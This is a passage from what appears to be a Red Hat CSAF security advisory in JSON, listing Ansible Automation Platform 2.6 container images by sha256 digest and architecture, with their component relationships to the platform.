"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9\u0026tag=1785647559"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3Ab475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9\u0026tag=1785649812"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3A6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9\u0026tag=1785779178"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3A6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9\u0026tag=1785777436"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator\u0026tag=1785630454"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3Aa217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9\u0026tag=1785770922"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/receptor-rhel9\u0026tag=1785632117"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
